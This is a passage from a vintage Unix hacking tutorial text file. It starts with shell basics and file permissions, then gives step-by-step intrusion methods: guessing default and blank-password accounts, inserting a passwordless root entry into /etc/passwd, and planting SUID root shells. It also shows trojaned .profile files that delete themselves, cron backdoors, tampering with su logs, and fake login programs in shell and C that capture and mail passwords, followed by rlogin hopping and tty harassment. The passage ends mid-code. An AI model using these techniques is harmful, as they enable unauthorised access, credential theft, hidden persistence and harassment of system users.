it seems like. an example would be: $ stty -parenb to make the data params N,8,1. A lot of Unixes operate at e,7,1 by default.sz,rz - send and recieve via zmodemrx,sx - send / recieve via xmodemrb,sb - send via batch ymodem. These 6 programs may or may not be on a unix.umodem - send/recieve via umodem. $ sz filename ready to send... $ rz filename please send your file.... ...etc..ed - text editor. Usage "ed filename" to create a file that doesn't exist, just enter in "ed filename" some versions of ed will give you a prompt, such as "*" others will not $ ed newtext 0 * a This is line 1 This is line 2 [control-z] * 1 [to see line one] This is line 1 * a [keep adding] This is line 3 [control-z] *0a [add after line 0] This is THE first line [control-z] 1,4l This is THE first line This is line 1 This is line 2 This is line 3 * w 71 * q $ The 71 is number of bytes written. a = append l = list # = print line number w - write l fname = load fname s fname = save to fname w = write to current file q = quitmesg - turn write permissions on or off to your terminal (allow chat) format "mesg y" or "mesg n"cc - the C compiler. don't worry about this one right now.chmod - change mode of a file. Change the access in other words. syntax: "chmod mode filename" $ chmod a+r newtext Now everyone can read newtext. a = all r = read. This will be explained further in the File System section.chown - change the owner of a file. syntax: "chown owner filename" $ chown scythian newtext $chgrp - change the group [explained later] of a file. syntax: "chgrp group file" $ chgrp root runme $finger - print out basic info on an account. Format: finger usernamegrep - search for patterns in a file. syntax: "grep pattern file" $ grep 1 newtext This is Line 1 $ grep THE newtext This is THE first line $ grep "THE line 1" newtext $mail - This is a very useful utility. Obviously, you already know what it is by its name. There are several MAIL utilities, such as ELM, MUSH and MSH, but the basic "mail" program is called "mail". The usage is: "mail username@address" or "mail username" or "mail" or "mail addr1!addr2!addr3!user" "mail username@address" - This is used to send mail to someone onanother system, which is usually another UNIX, but some DOS machines and someVAX machines can recieve Unix Mail. When you use "mail user@address" thesystem you are on MUST have a "smart mailer" [known as smail], and musthave what we call system maps. The smart mailer will find the "adress" partof the command and expand it into the full pathname usually. I could looklike this: mail phiber@optik then look like this to the computer: mail sys1!unisys!pacbell!sbell!sc1!att.com!sirhacksys!optik!phiberDo not worry about it, I was merely explaining the principal of the thing.Now, if there is no smart mailer online, you'll have to know the FULL pathname of the person you wish to mail to. For Instance, I want to mail to.. phiber. I'd do this if there were no smart mailer: $ mail sys!unisys!pacbell!sbell!sc1!att.com!sirhacksys!optik!phiber Hey Guy. Whats up? Well, gotta go. Nice long message huh? [control-D] $Then, when he got it, there would be about 20 lines of information, withlike a post mark from every system my message went thru, and the "from" linewould look like so:From optik!sirhacksys!att.com!sc1!sbell!pacbell!unisys!sys!sirhack Now, for local mailing, just type in "mail username" where usernameis the login you want to send mail to. Then type in your message. Thenend it with a control-D. To read YOUR mail, just type in mail. IE: $ mail From scythian ............ To sirhack ............ Subject: Well.... Arghhh! ? The dots represent omitted crap. Each Mail program makes its own headings. That ? is a prompt. At this prompt I can type: d - delete f username - forward to username w fname - write message to a file named fname s fname - save message with header into file q - quit / update mail x - quit, but don't change a thing m username - mail to username r - reply [enter] - read next message + - go forward one message - : go back one h - print out message headers that are in your mailbox.There are others, to see them, you'd usually hit '?'.--------If you send mail to someone not on your system, you will have to wait longerfor a reply, since it is just as a letter. A "postman" has to pick it up.The system might call out, and use UUCP to transfer mail. Usually, uucpaccounts are no good to one, unless you have uucp available to intercept mail.ps - process. This command allows you to see what you are actually doingin memory. Everytime you run a program, it gets assigned a Process Id number(PID), for accounting purposes, and so it can be tracked in memory, aswell as shut down by you, or root. usually, the first thing in a processlist given by "ps" is your shell name. Say I was logged in under sirhack,using the shell "csh" and running "watch scythian". The watch program wouldgo into the background, meaning I'd still be able to do things while it wasrunning: $ ps PID TTY NAME 122 001 ksh 123 001 watch $ That is a shortened PS. That is the default listing [a brief one]. The TTY column represents the "tty" [i/o device] that the process is being run from. This is only useful really if you are using layers (don't worry) or more than one person is logged in with the same account name. Now, "ps -f" would give a full process listing on yourself, so instead of seeing just plain ole "watch" you'd most likely see "watch scythian"kill - kill a process. This is used to terminate a program in memory obvio-ously. You can only kill processes you own [ones you started], unless youare root, or your EUID is the same as the process you want to kill.(Will explain euid later). If you kill the shell process, you are loggedoff. By the same token, if you kill someone else's shell process, theyare logged off. So, if I said "kill 122" I would be logged off. However,kill only sends a signal to UNIX telling it to kill off a process. Ifyou just use the syntax "kill pid" then UNIX kills the process WHEN it feelslike it, which may be never. So, you can specify urgency! Try "kill -num pid"Kill -9 pid is a definite kill almost instantly. So if I did this: $ kill 122 $ kill 123 $ ps PID TTY NAME 122 001 ksh 123 001 watch $ kill -9 123 [123]: killed $ kill -9 122 garbage NO CARRIERAlso, you can do "kill -1 0" to kill your shell process to log yourself off.This is useful in scripts (explained later).-------------------Shell Programmin'------------------- Shell Programming is basically making a "script" file for thestandard shell, being sh, ksh, csh, or something on those lines. Itslike an MSDOS batch file, but more complex, and more Flexible.This can be useful in one aspect of hacking.First, lets get into variables. Variables obviously can be assignedvalues. These values can be string values, or numberic values.number=1 That would assign 1 to the variable named "number".string=Hi Thereorstring="Hi There" Both would assign "Hi there" to a variable. Using a variable is different though. When you wish to use a variable you must procede it with a dollar ($) sign. These variables can be used as arguments in programs. When I said that scripts are like batch files, I meant it. You can enter in any name of a program in a script file, and it will execute it. Here is a sample script.counter=1arg1="-uf"arg2="scythian"ps $arg1 $arg2echo $counter That script would translate to "ps -uf scythian" then would print "1" after that was finished. ECHO prints something on the screen whether it be numeric, or a string constant.Other Commands / Examples:read - reads someting into a variable. format : read variable . No dollar sign is needed here! If I wwanted to get someone's name, I could put:echo "What is your name?"read hisnameecho Hello $hisname What is your name? Sir Hackalot Hello Sir Hackalot Remember, read can read numeric values also.trap - This can watch for someone to use the interrupt character. (Ctrl-c) format: trap "command ; command ; command ; etc.."Example: trap "echo 'Noway!! You are not getting rid o me that easy' ; echo 'You gotta see this through!'" Now, if I hit control-c during the script after this statement was executed, I'd get: Noway!! You are not getting rid of me that easy You gotta see this through!exit : format :exit [num] This exists the shell [quits] with return code of num.-----CASE----- Case execution is like a menu choice deal. The format of the command or structure is : case variable in 1) command; command;; 2) command; command; command;; *) command;; esac Each part can have any number of commands. The last command however must have a ";;". Take this menu: echo "Please Choose:" echo "(D)irectory (L)ogoff (S)hell" read choice case $choice in D) echo "Doing Directory..."; ls -al ;; L) echo Bye; kill -1 0;; S) exit;; *) Echo "Error! Not a command";; esac The esac marks the end of a case function. It must be after the LAST command.Loops----- Ok, loops. There are two loop functins. the for loops, and the repeat. repeat looks like this: repeat something somethin1 somethin2 this would repeat a section of your script for each "something". say i did this: repeat scythian sirhack prophet I may see "scythian" then sirhack then prophet on my screen. The for loop is defined as "for variable in something do .. .. done" an example: for counter in 1 2 3 do echo $counter done That would print out 1 then 2 then 3.Using TEST----------The format: Test variable option variableThe optios are:-eq =-ne <> (not equal)-gt >-lt <-ge >=-le <=for strings its: = for equal != for not equal.If the condition is true, a zero is returned. Watch: test 3 -eq 3that would be test 3 = 3, and 0 would be returned.EXPR----This is for numeric functions. You cannot simply type inecho 4 + 5and get an answer most of the time. you must say:expr variable [or number] operator variable2 [or number]the operators are:+ add- subtract* multiply/ divide^ - power (on some systems)example : expr 4 + 5var = expr 4 + 5var would hold 9. On some systems, expr sometimes prints out a formula. I mean, 22+12 is not the same as 22 + 12. If you said expr 22+12 you would see: 22+12 If you did expr 22 + 12 you'd see: 34SYSTEM VARIABLES---------------- These are variables used by the shell, and are usually set in thesystem wide .profile [explained later].HOME - location of your home directory.PS1 - The prompt you are given. usually $ . On BSD its usually &PATH - This is the search path for programs. When you type in a programto be run, it is not in memory; it must be loaded off disk. Most commandsare not in Memory like MSDOS. If a program is on the search path, it maybe executed no matter where you are. If not, you must be in the directorywhere the program is. A path is a set of directories basically, seperated by":"'s. Here is a typical search path: :/bin:/etc:/usr/lbin:$HOME:When you tried to execute a program, Unix would look for it in /bin,/etc, /usr/lbin, and your home directory, and if its not found, an error isspewed out. It searches directories in ORDER of the path. SO if you had aprogram named "sh" in your home directory, and typed in "sh", EVEN ifyou were in your home dir, it would execute the one in /bin. So, youmust set your paths wisely. Public access Unixes do this for you, but systemsyou may encounter may have no path set.TERM - This is your terminal type. UNIX has a library of functions called"CURSES" which can take advantage of any terminal, provided the escapecodes are found. You must have your term set to something if you runscreen oriented programs. The escape codes/names of terms are foundin a file called TERMCAP. Don't worry about that. just set your termto ansi or vt100. CURSES will let you know if it cannot manipulate yourterminal emulation.-------------------The C compiler------------------- This Will be BRIEF. Why? Becuase if you want to learn C, go buy a book. I don't have time to write another text file on C, for it would be huge. Basically, most executables are programmed in C. Source code files on unix are found as filename.c . To compile one, type in "cc filename.c". Not all C programs will compile, since they may depend on other files not there, or are just modules. If you see a think called "makefile" you can usually type in just "make" at the command prompt, and something will be compiled, or be attempted to compile. When using make or CC, it would be wise to use the background operand since compiling sometimes takes for ever. IE: $ cc login.c& [1234] $ (The 1234 was the process # it got identified as)._____________________________________________________________________________---------------The FILE SYSTEM--------------- This is an instrumental part of UNIX. If you do not understand thissection, you'll never get the hang of hacking Unix, since a lot of Pranksyou can play, and things you can do to "raise your access" depend on it.First, Let's start out by talking about the directory structure. It isbasically a Hiearchy file system, meaning, it starts out at a root directoryand expands, just as MSDOS, and possibly AmigaDos.Here is a Directory Tree of sorts: (d) means directory / (root dir) -------------------- bin (d) usr (d) ----^-------------------- sirhack(d) scythian (d) prophet (d) src (d)Now, this particular system contains the following directories://bin/usr/usr/sirhack/usr/sirhack/src/usr/scythian/usr/prophetHopefully, you understood that part, and you should. Everything spawns fromthe root directory.o File Permissions!------------------Now, this is really the biggie. File Permissions. It is not that hard tounderstand file permissions, but I will explain them deeply anyway.OK, now you must think of user groups as well as user names. Everyonebelongs to a group. at the $ prompt, you could type in 'id' to see whatgroup you are in. Ok, groups are used to allow people access certain things,instead of just having one person controlling/having access to certain files.Remember also, that Unix looks at someone's UID to determine access, notuser name.Ok. File permissions are not really that complicated. Each file has an ownerThis OWNER is usually the one who creates the file, either by copying a fileor just by plain editing one. The program CHOWN can be used to give someoneownership of a file. Remember that the owner of a file must be the one whoruns CHOWN, since he is the only one that can change the permissions of a fileAlso, there is a group owner, which is basically the group that you were inwhen the file was created. You would use chgrp to change the group a file isin.Now, Files can have Execute permissions, read permissions, or write permission.If you have execute permission, you know that you can just type in the nameof that program at the command line, and it will execute. If you have readpermission on a file, you can obviously read the file, or do anything thatreads the file in, such as copying the file or cat[ing] it (Typing it).If you do NOT have access to read a file, you can't do anything that requiresreading in the file. This is the same respect with write permission. Now,all the permissions are arranged into 3 groups. The first is the owner'spermissions. He may have the permissions set for himself to read and executethe file, but not write to it. This would keep him from deleting it.The second group is the group permissions. Take an elongated directoryfor an example: $ ls -l runme r-xrwxr-- sirhack root 10990 March 21 runmeok. Now, "root" is the groupname this file is in. "sirhack" is the owner.Now, if the group named 'root' has access to read, write and execute, theycould do just that. Say .. Scythian came across the file, and was in the rootuser group. He could read write or execute the file. Now, say datawiz cameacross it, but was in the "users" group. The group permissions would notapply to him, meaning he would have no permissions, so he couldn't touchthe file, right? Sorta. There is a third group of permissions, and this isthe "other" group. This means that the permissions in the "other" groupapply to everyone but the owner, and the users in the same group as the file.Look at the directory entry above. the r-x-rwxr-- is the permissions line.The first three characters are the permissions for the owner (r-x). The"r-x" translates to "Read and execute permissions, but no write permissions"the second set of three, r-xRWXr-- (the ones in capital letters) are the grouppermissions. Those three characters mean "Read, write, and execution allowed"The 3rd set, r-xrwxR-- is the permissions for everyone else. It means"Reading allowed, but nothing else". A directory would look something likethis: $ ls -l drwxr-xr-x sirhack root 342 March 11 srcA directory has a "d" at the beggining of the permissions line. Now, theowner of the directory (sirhack) can read from the directory, write in thedirectory, and execute programs from the directory. The root group and every-one else can only read from the directory, and execute off the directory.So, If I changed the directory to be executable only, this iswhat it would look like: $ chmod go-r $ ls drwx--x--x sirhack root 342 March 11 srcNow, if someone went into the directory besides "sirhack", they could onlyexecute programs in the directory. If they did an "ls" to get a directoryof src, when they were inside src, it would say "cannot read directory".If there is a file that is readable in the directory, but the directory isnot readable, it is sometimes possible to read the file anyway.If you do not have execute permissions in a directory, you won't be able toexecute anything in the directory, most of the time._____________________________________________________________________________--------------Hacking:-------------- The first step in hacking a UNIX is to get into the operating systemby finding a valid account/password. The object of hacking is usually toget root (full privileges), so if you're lucky enough to get in as root,you need not read anymore of this hacking phile , and get into the"Having Fun" Section. Hacking can also be just to get other's accounts also.Getting IN---------- The first thing to do is to GET IN to the Unix. I mean, get pastthe login prompt. That is the very first thing. When you come across a UNIX,sometimes it will identify itself by saying something like,"Young INC. Company UNIX"or Just"Young Inc. Please login" Here is where you try the defaults I listed. If you get in with thoseyou can get into the more advanced hacking (getting root). If you do somethingwrong at login, you'll get the message"login incorrect"This was meant to confuse hackers, or keep the wondering. Why?Well, you don't know if you've enterred an account that does not exist, or onethat does exist, and got the wrong password. If you login as root and it says"Not on Console", you have a problem. You have to login as someone else,and use SU to become root. Now, this is where you have to think. If you cannot get in with adefault, you are obviously going to have to find something else tologin as. Some systems provide a good way to do this by allowing the useof command logins. These are ones which simply execute a command, thenlogoff. However, the commands they execute are usually useful. For instancethere are three common command logins that tell you who is online at thepresent time. They are: who rwho finger If you ever successfully get one of these to work, you can write downthe usernames of those online, and try to logon as them. Lots of unsuspectingusers use there login name as their password. For instance, the user"bob" may have a password named "bob" or "bob1". This, as you know, isnot smart, but they don't expect a hacking spree to be carried out onthem. They merely want to be able to login fast. If a command login does not exist, or is not useful at all, you willhave to brainstorm. A good thing to try is to use the name of the unixthat it is identified as. For instance, Young INC's Unix may have an accountnamed "young" Young, INC. Please Login. login: young UNIX SYSTEM V REL 3.2 (c)1984 AT&T.. .. .. .. Some unixes have an account open named "test". This is also a default,but surprisingly enough, it is sometimes left open. It is good to try touse it. Remember, brainstorming is the key to a unix that has no apparentdefaults open. Think of things that may go along with the Unix. typein stuff like "info", "password", "dial", "bbs" and other things thatmay pertain to the system. "att" is present on some machines also.ONCE INSIDE -- SPECIAL FILES---------------------------- There are several files that are very important to the UNIXenvironment. They are as follows:/etc/passwd - This is probably the most important file on a Unix. Why? well, basically, it holds the valid usernames/passwords. This is important since only those listed in the passwd file can login, and even then some can't (will explain). The format for the passwordfile is this:username:password:UserID:GroupID:description(or real name):homedir:shell Here are two sample entries:sirhack:89fGc%^7&a,Ty:100:100:Sir Hackalot:/usr/sirhack:/bin/shdemo::101:100:Test Account:/usr/demo:/usr/sh In the first line, sirhack is a valid user. The second field, however, is supposed to be a password, right? Well, it is, but it's encrypted with the DES encryption standard. the part that says "&a,Ty" may include a date after the comma (Ty) that tells unix when the password expires. Yes, the date is encrypted into two alphanumeric characters (Ty). In the Second example, the demo account has no password. so at Login, you could type in:login: demoUNIX system V(c)1984 AT&T.... But with sirhack, you'd have to enter a password. Now, the password file is great, since a lot of times, you;ll be able to browse through it to look for unpassworded accounts. Remember that some accounts can be restricted from logging in, as such:bin:*:2:2:binaccount:/bin:/bin/sh The '*' means you won't be able to login with it. Your only hope would be to run an SUID shell (explained later). A note about the DES encryption: each unix makes its own unique"keyword" to base encryption off of. Most of the time its just random lettersand numbers. Its chosen at installation time by the operating system. Now, decrypting DES encrypted things ain't easy. Its pretty muchimpossible. Especially decrypting the password file (decrypting the passwordfield within the password file to be exact). Always beware a hacker whosays he decrypted a password file. He's full of shit. Passwords arenever decrypted on unix, but rather, a system call is made to a functioncalled "crypt" from within the C language, and the string you enter asthe password gets encrypted, and compared to the encrypted password. Ifthey match, you're in. Now, there are password hackers, but they donotdecrypt the password file, but rather, encrypt words from a dictionaryand try them against every account (by crypting/comparing) until it findsa match (later on!). Remember, few, if none, have decrypted the passwordfile successfuly./etc/group - This file contains The valid groups. The group file is usually defined as this: groupname:password:groupid:users in group Once again, passwords are encrypted here too. If you see a blank in the password entry you can become part of that group by using the utility "newgrp". Now, there are some cases in which even groups with no password will allow only certain users to be assigned to the group via the newgrp command. Usually, if the last field is left blank, that means any user can use newgrp to get that group's access. Otherwise, only the users specified in the last field can enter the group via newgrp. Newgrp is just a program that will change your group current group id you are logged on under to the one you specify. The syntax for it is: newgrp groupname Now, if you find a group un passworded, and use newgrp to enter it, and it asks for a password, you are not allowed to use the group. I will explain this further in The "SU & Newgrp" section./etc/hosts - this file contains a list of hosts it is connected to thru a hardware network (like an x.25 link or something), or sometimes just thru UUCP. This is a good file when you are hacking a large network, since it tells you systems you can use with rsh (Remote Shell, not restricted shell), rlogin, and telnet, as well as other ethernet/x.25 link programs./usr/adm/sulog (or su_log) - the file sulog (or su_log) may be found in Several directories, but it is usually in /usr/adm. This file is what it sounds like. Its a log file, for the program SU. What it is for is to keep a record of who uses SU and when. whenever you use SU, your best bet would be to edit this file if possible, and I'll tell you how and why in the section about using "su"./usr/adm/loginlogor /usr/adm/acct/loginlog - This is a log file, keeping track of the logins. Its purpose is merely for accounting and "security review". Really, sometimes this file is never found, since a lot of systems keep the logging off./usr/adm/errlogor errlog - This is the error log. It could be located anywhere. It keeps track of all serious and even not so serious errors. Usually, it will contain an error code, then a situation. the error code can be from 1-10, the higher the number, the worse the error. Error code 6 is usually used when you try to hack. "login" logs your attempt in errlog with error code 6. Error code 10 means, in a nutshell, "SYSTEM CRASH"./usr/adm/culog - This file contains entries that tell when you used cu, where you called and so forth. Another security thing./usr/mail/ - this is where the program "mail" stores its mail. to read a particular mailbox, so they are called, you must be that user, in the user group "mail" or root. each mailbox is just a name. for instance, if my login was "sirhack" my mail file would usually be: /usr/mail/sirhack/usr/lib/cron/crontabs - This contains the instructions for cron, usually. Will get into this later./etc/shadow - A "shadowed" password file. Will talk about this later.-- The BIN account -- Well, right now, I'd like to take a moment to talk about the account"bin". While it is only a user level account, it is very powerful. It isthe owner of most of the files, and on most systems, it owns /etc/passwd,THE most important file on a unix. See, the bin account owns most of the"bin" (binary) files, as well as others used by the binary files, suchas login. Now, knowing what you know about file permissions, if bin ownsthe passwd file, you can edit passwd and add a root entry for yourself.You could do this via the edit command:$ ed passwd10999 [The size of passwd varies]* asirhak::0:0:Mr. Hackalot:/:/bin/sh{control-d}* w* q$Then, you could say: exec login, then you could login as sirhack, andyou'd be root./\/\/\/\/\/\/\/\/Hacking........../\/\/\/\/\/\/\/\/--------------Account Adding-------------- There are other programs that will add users to the system, insteadof ed. But most of these programs will NOT allow a root level user to beadded, or anything less than a UID of 100. One of these programs isnamed "adduser". Now, the reason I have stuck this little section in, isfor those who want to use a unix for something useful. Say you want a"mailing address". If the unix has uucp on it, or is a big college,chances are, it will do mail transfers. You'll have to test the unixby trying to send mail to a friend somewhere, or just mailing yourself.If the mailer is identified as "smail" when you mail yourself (the programname will be imbedded in the message) that probably means that the systemwill send out UUCP mail. This is a good way to keep in contact with people.Now, this is why you'd want a semi-permanent account. The way to achieve thisis by adding an account similar to those already on the system. If all theuser-level accounts (UID >= 100) are three letter abbriviations, say"btc" for Bill The Cat, or "brs" for bill ryan smith, add an accountvia adduser, and make a name like sally jane marshall or something(they don't expect hackers to put in female names) and have the accountnamed sjm. See, in the account description (like Mr. Hackalot above), thatis where the real name is usually stored. So, sjm might look like this: sjm::101:50:Sally Jane Marshall:/usr/sjm:/bin/shOf course, you will password protect this account, right?Also, group id's don't have to be above 100, but you must put the accountinto one that exists. Now, once you login with this account, the firstthing you'd want to do is execute "passwd" to set a password up. If youdon't, chances are someone else 'll do it for you (Then you'll be SOL).-------------------Set The User ID------------------- This is porbably one of the most used schemes. Setting up an "UID-Shell". What does this mean? Well, it basically means you are goingto set the user-bit on a program. The program most commonly used isa shell (csh,sh, ksh, etc). Why? Think about it: You'll have accessto whatever the owner of the file does. A UID shell sets the user-ID ofthe person who executes it to the owner of the program. So if rootowns a uid shell, then you become root when you run it. This is analternate way to become root. Say you get in and modify the passwd file and make a root levelaccount unpassworded, so you can drop in. Of course, you almost HAVE toget rid of that account or else it WILL be noticed eventually. So, whatyou would do is set up a regular user account for yourself, then, makea uid shell. Usually you would use /bin/sh to do it. After addingthe regular user to the passwd file, and setting up his home directory,you could do something like this:(assume you set up the account: shk) # cp /bin/sh /usr/shk/runme # chmod a+s /usr/shk/runmeThats all there would be to it. When you logged in as shk, you could justtype in: $ runme #See? You'd then be root. Here is a thing to do:$ iduid=104(shk) gid=50(user)$ runme# iduid=104(shk) gid=50(user) euid=0(root)#The euid is the "effective" user ID. UID-shells only set the effectiveuserid, not the real user-id. But, the effective user id over-rides thereal user id. Now, you can, if you wanted to just be annoying, makethe utilities suid to root. What do I mean? For instance, make 'ls'a root 'shell'. :# chmod a+s /bin/ls# exit$ ls -l /usr/fred........etc crapLs would then be able to pry into ANY directory. If you did the same to"cat" you could view any file. If you did it to rm, you could delete anyfile. If you did it to 'ed', you could edit any-file (nifty!), anywhere onthe system (usually).How do I get root?------------------ Good question indeed. To make a program set the user-id shell to root,you have to be root, unless you're lucky. What do I mean? Well, sayyou find a program that sets the user-id to root. If you have accessto write to that file, guess what? you can copy over it, but keepthe uid bit set. So, say you see that the program chsh is settingthe user id too root. You can copy /bin/sh over it.$ ls -lrwsrwsrws root other 10999 Jan 4 chsh$ cp /bin/sh chsh$ chsh#See? That is just one way. There are others, which I will now talkabout.More on setting the UID----------------------- Now, the generic form for making a program set the User-ID bitis to use this command:chmod a+s fileWhere 'file' is a valid existing file. Now, only those who own the filecan set the user ID bit. Remember, anything YOU create, YOU own, so ifyou copy th /bin/sh, the one you are logged in as owns it, or IF theUID is set to something else, the New UID owns the file. This bringsme to BAD file permissions.II. HACKING : Bad Directory Permissions Now, what do I mean for bad directory permissions? Well, look forfiles that YOU can write to, and above all, DIRECTORIES you can write to.If you have write permissions on a file, you can modify it. Now, this comesin handy when wanting to steal someone's access. If you can write toa user's .profile, you are in business. You can have that user's .profilecreate a suid shell for you to run when You next logon after the user.If the .profile is writable to you, you can do this:$ ed .profile[some number will be here]? acp /bin/sh .runmechmod a+x .runmechmod a+s .runme(control-d)? w[new filesize will be shown]? q$ Now, when the user next logs on, the .profile will create .runme which will set your ID to the user whose .profile you changed. Ideally, you'll go back in and zap those lines after the suid is created, and you'll create a suid somewhere else, and delete the one in his dir. The .runme will not appear in the user's REGULAR directory list, it will only show up if he does "ls -a" (or ls with a -a combination), because, the '.' makes a file hidden.The above was a TROJAN HORSE, which is one of the most widely used/abusedmethod of gaining more power on a unix. The above could be done in C viathe system() command, or by just plain using open(), chmod(), and the like.* Remember to check and see if the root user's profile is writeable ** it is located at /.profile (usually) * The BEST thing that could happen is to find a user's directory writeable by you. Why? well, you could replace all the files in the directory with your own devious scripts, or C trojans. Even if a file is not writeable by you, you can still overwrite it by deleteing it. If you can read various files, such as the user's .profile, you can make a self deleting trojan as so: $ cp .profile temp.pro $ ed .profile 1234 ? a cp /bin/sh .runme chmod a+x .runme chmod a+s .runme mv temp.pro .profile (control-d) ? w [another number] ? q $ chown that_user temp.pro What happens is that you make a copy of the .profile before you change it. Then, you change the original. When he runs it, the steps are made, then the original version is placed over the current, so if the idiot looks in his .profile, he won't see anything out of the ordinary, except that he could notice in a long listing that the change date is very recent, but most users are not paranoid enough to do extensive checks on their files, except sysadm files (such as passwd). Now, remember, even though you can write to a dir, you may not be able to write to a file without deleting it. If you do not have write perms for that file, you'll have to delete it and write something in its place (put a file with the same name there). The most important thing to remember if you have to delete a .profile is to CHANGE the OWNER back after you construct a new one (hehe) for that user. He could easily notice that his .profile was changed and he'll know who did it. YES, you can change the owner to someone else besides yourself and the original owner (as to throw him off), but this is not wise as keeping access usually relies on the fact that they don't know you are around. You can easily change cron files if you can write to them. I'm not going to go into detail about cronfile formats here, just find the crontab files and modify them to create a shell somewhere as root every once in a while, and set the user-id.III. Trojan Horses on Detached terminals. Basically this: You can send garbage to a user's screen and mess him up bad enough to force a logoff, creating a detached account. Then you can execute a trojan horse off that terminal in place of login or something, so the next one who calls can hit the trojan horse. This USUALLY takes the form of a fake login and write the username/pw entererred to disk. Now, there are other trojan horses available for you to write. Now, don't go thinking about a virus, for they don't work unless ROOT runs them. Anyway, a common trjan would be a shell script to get the password, and mail it to you. Now, you can replace the code for the self deleting trojan with one saying something like: echo "login: \c" read lgin echo off (works on some systems) (if above not available...: stty -noecho) echo "Password:\c" read pw echo on echo "Login: $lgin - Pword: $pw" mail you Now, the best way to use this is to put it in a seperate script file so it can be deleted as part of the self deleting trojan. A quick modification, removing the "login: " and leaving the password may have it look like SU, so you can get the root password. But make sure the program deletes itself. Here is a sample trojan login in C: #include /* Get the necessary defs.. */ main() { char *name[80]; char *pw[20]; FILE *strm; printf("login: "); gets(name); pw = getpass("Password:"); strm = fopen("/WhereEver/Whateverfile","a"); fprintf(strm,"User: (%s), PW [%s]\n",name,pw); fclose(strm); /* put some kind of error below... or something... */ printf("Bus Error - Core Dumped\n"); exit(1); } The program gets the login, and the password, and appends it to a file (/wherever/whateverfile), and creates the file if it can, and if its not there. That is just an example. Network Annoyances come later. IV. Odd systems There may be systems you can log in to with no problem, and find someslack menu, database, or word processor as your shell, with no way to thecommand interpreter (sh, ksh, etc..). Don't give up here. Some systems willlet you login as root, but give you a menu which will allow you to add anaccount. However, ones that do this usually have some purchased softwarepackage running, and the people who made the software KNOW that the peoplewho bought it are idiots, and the thing will sometimes only allow you toadd accounts with user-id 100 or greater, with their special menushell asa shell. You probably won't get to pick the shell, the program will probablystick one on the user you created which is very limiting. HOWEVER, sometimesyou can edit accounts, and it will list accounts you can edit on the screen.HOWEVER, these programs usually only list those with UIDS > 100 so you don'tedit the good accounts, however, they donot stop you from editing an accountwith a UID < uid="100(sirhack)" gid="100(users)">: /etc/passwd (you see: ) root:dkdjkgsf!!!:0:0:Sysop:/:/bin/sh sirhack:dld!k%%^%:100:100:Sir Hackalot:/usr/usr1/sirhack:/bin/sh datawiz::101:100:The Data Wizard:/usr/usr1/datawiz:/bin/sh ...Now I have found an account to take over! "datawiz" will get me in with notrouble, then I can change his password, which he will not like at all.Some systems leave "sysadm" unpassworded (stupid!), and now, Most versionsof Unix, be it Xenix, Unix, BSD, or whatnot, they ship a sysadm shell whichwill menu drive all the important shit, even creating users, but you musthave ansi or something. You can usually tell when you'll get a menu. Sometimes on UNIX SYSTEM V, when it says TERM = (termtype), and is waiting for you to press return or whatever, you will probably get a menu.. ack.V. Shadowed Password files Not much to say about this. all it is, is when every password field in the password file has an "x" or just a single character. What that does is screw you, becuase you cannot read the shadowed password file, only root can, and it contains all the passwords, so you will not know what accounts have no passwords, etc.There are a lot of other schemes for hacking unix, lots of others, fromwriting assembly code that modifies the PCB through self-changing code whichthe interrupt handler doesn't catch, and things like that. However, I donot want to give away everything, and this was not meant for advanced UnixHackers, or atleast not the ones that are familiar with 68xxx, 80386 Unixassembly language or anything. Now I will Talk about Internet.--->>> InterNet <<<--- Why do I want to talk about InterNet? Well, because it is a primeexample of a TCP/IP network, better known as a WAN (Wide-Area-Network).Now, mainly you will find BSD systems off of the Internet, or SunOS, forthey are the most common. They may not be when System V, Rel 4.0, Version2.0 comes out. Anyway, these BSDs/SunOSs like to make it easy to jumpfrom one computer to another once you are logged in. What happens isEACH system has a "yello page password file". Better known as yppasswd.If you look in there, and see blank passwords you can use rsh, rlogin, etc..to slip into that system. One system in particular I came across had aa yppasswd file where *300* users had blank passwords in the Yellow Pages.Once I got in on the "test" account, ALL I had to do was select who I wantedto be, and do: rlogin -l user (sometimes -n). Then it would log me ontothe system I was already on, through TCP/IP. However, when you do this,remember that the yppasswd only pertains to the system you are on atthe time. To find accounts, you could find the yppasswd file and do:% cat yppasswd grep ::Or, if you can't find yppasswd..% ypcat passwd grep ::On ONE system (which will remain confidential), I found the DAEMON accountleft open in the yppasswd file. Not bad. Anyway, through one systemon the internet, you can reach many. Just use rsh, or rlogin, and lookin the file: /etc/hosts for valid sites which you can reach. If you geton to a system, and rlogin to somewhere else, and it asks for a password,that just means one of two things:A. Your account that you have hacked on the one computer is on the target computer as well. Try to use the same password (if any) you found the hacked account to have. If it is a default, then it is definitly on the other system, but good luck...B. rlogin/rsh passed your current username along to the remote system, so it was like typing in your login at a "login: " prompt. You may not exist on the other machine. Try "rlogin -l login_name", or rlogin -n name.. sometimes, you can execute "rwho" on another machine, and get a valid account.Some notes on Internet servers. There are "GATEWAYS" that you can get intothat will allow access to MANY internet sites. They are mostly run offa modified GL/1 or GS/1. No big deal. They have help files. However,you can get a "privilged" access on them, which will give you CONTROL ofthe gateway.. You can shut it down, remove systems from the Internet, etc..When you request to become privileged, it will ask for a password. There isa default. The default is "system". I have come across *5* gateways withthe default password. Then again, DECNET has the same password, and I havecome across 100+ of those with the default privileged password. CERT Sucks.a Gateway that led to APPLE.COM had the default password. Anyone couldhave removed apple.com from the internet. Be advised that there are manynetworks now that use TCP/IP.. Such as BARRNET, LANET, and many otherUniversity networks.--** Having Fun **--Now, if nothing else, you should atleast have some fun. No, I do not meango trashing hardrives, or unlinking directories to take up inodes, I meanplay with online users. There are many things to do. Re-direct outputto them is the biggie. Here is an example: $ who loozer tty1 sirhack tty2 $ banner You Suck >/dev/tty1 $ That sent the output to loozer. The TTY1 is where I/O is being performed to his terminal (usually a modem if it is a TTY). You can repetitiously banner him with a do while statement in shell, causing him to logoff. Or you can get sly, and just screw with him. Observe this C program:#include #include #include main(argc,argument)int argc;char *argument[];{ int handle; char *pstr,*olm[80]; char *devstr = "/dev/"; int acnt = 2; FILE *strm; pstr = ""; if (argc == 1) { printf("OL (OneLiner) Version 1.00 \n"); printf("By Sir Hackalot [PHAZE]\n"); printf("\nSyntax: ol tty message\n"); printf("Example: ol tty01 You suck\n"); exit(1); } printf("OL (OneLiner) Version 1.0\n"); printf("By Sir Hackalot [PHAZE]\n"); if (argc == 2) { strcpy(olm,""); printf("\nDummy! You forgot to Supply a ONE LINE MESSAGE\n"); printf("Enter one Here => "); gets(olm); } strcpy(pstr,""); strcat(pstr,devstr); strcat(pstr,argument[1]); printf("Sending to: [%s]\n",pstr); strm = 